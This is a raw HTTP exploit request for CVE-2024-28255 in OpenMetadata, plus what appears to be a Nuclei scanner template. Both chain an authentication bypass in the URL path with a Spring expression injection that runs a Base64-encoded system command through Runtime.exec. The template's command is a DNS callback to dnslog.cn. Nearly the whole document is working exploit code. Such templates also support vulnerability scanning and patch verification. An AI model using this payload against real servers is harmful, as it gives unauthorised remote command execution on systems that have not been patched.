GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64编码命令%22))) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Connection: close
Accept-Encoding: gzip
id: CVE-2024-28255
info:
name: CVE-2024-28255
author: xiaoming
severity: high
description: OpenMetadata Command Execution
metadata:
max-request: 1
shodan-query: ""
verified: true
http:
- raw:
- |+
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgdGVzdC5kbnNsb2cuY24=%22))) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Connection: close
Accept-Encoding: gzip
redirects: true
matchers-condition: and
matchers:
- id: 1
type: word
part: body
words:
- "400"
- java.lang.ProcessImpl
condition: and